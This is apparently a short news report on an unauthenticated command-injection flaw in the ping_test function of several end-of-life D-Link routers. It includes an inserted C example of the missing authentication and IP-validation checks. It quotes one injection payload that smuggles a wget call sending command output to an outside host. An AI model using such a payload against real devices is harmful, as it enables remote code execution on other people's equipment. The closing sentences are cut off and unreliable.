In D-Link wireless routers
Interestingly, according to the firmware developers, the "ping_test" call should only be executed after authentication, but in practice it is called in every case, regardless of whether the user is logged in to the web interface. In particular, when the apply_sec.cgi script is accessed with the "action=ping_test" parameter, the script redirects to the authentication page but at the same time performs the action associated with ping_test. To execute code, a second vulnerability was used in ping_test itself, which calls the ping utility without properly checking the validity of the IP address submitted for testing. For example, to call the wget utility and pass the output of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".
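The two checks whose absence is described above, as an added example that is not the D-Link firmware's code: the handler stops at the login redirect instead of continuing to the action, and the address is accepted only if it parses as a literal IPv4 address. The names handle_request and is_valid_ipv4, the return codes and the /bin/ping path are assumptions for illustration.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

enum { REQ_OK = 0, REQ_REDIRECT_LOGIN = 1, REQ_BAD_ADDRESS = 2, REQ_UNKNOWN_ACTION = 3 };

/* Accept only a literal IPv4 address. inet_pton() rejects any trailing
 * bytes, so a decoded "%0a" newline followed by a command fails here. */
static int is_valid_ipv4(const char *s)
{
    struct in_addr addr;
    return s != NULL && strlen(s) < INET_ADDRSTRLEN &&
           inet_pton(AF_INET, s, &addr) == 1;
}

/* Hypothetical handler for the already URL-decoded request parameters.
 * On REQ_OK, argv holds an argument vector suitable for execv(): no shell
 * is involved, so metacharacters are never interpreted. */
int handle_request(int authenticated, const char *action,
                   const char *ping_ipaddr, const char *argv[5])
{
    argv[0] = NULL;
    if (!authenticated)
        return REQ_REDIRECT_LOGIN;  /* redirect and do nothing else */
    if (action == NULL || strcmp(action, "ping_test") != 0)
        return REQ_UNKNOWN_ACTION;
    if (!is_valid_ipv4(ping_ipaddr))
        return REQ_BAD_ADDRESS;
    argv[0] = "/bin/ping";          /* assumed path */
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = ping_ipaddr;
    argv[4] = NULL;
    return REQ_OK;
}

int main(void)
{
    const char *argv[5];
    /* Constructed input: decoded form of the parameter quoted above. */
    const char *bad = "127.0.0.1\nwget -P /tmp/ http://test.test/?$(echo 1234)";
    printf("unauthenticated: %d\n", handle_request(0, "ping_test", "127.0.0.1", argv));
    printf("injected value:  %d\n", handle_request(1, "ping_test", bad, argv));
    printf("valid address:   %d\n", handle_request(1, "ping_test", "127.0.0.1", argv));
    return 0;
}
```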
The presence of the vulnerability has been officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or higher;
- DIR-866L with firmware 1.03b04 or higher;
- DIR-1565 with firmware 1.01 or higher;
- DIR-652 (no information about the affected firmware versions is provided).
The support period for these models has already expired, so D-Link
Later, it was also found to be vulnerable
Source: opennet.ru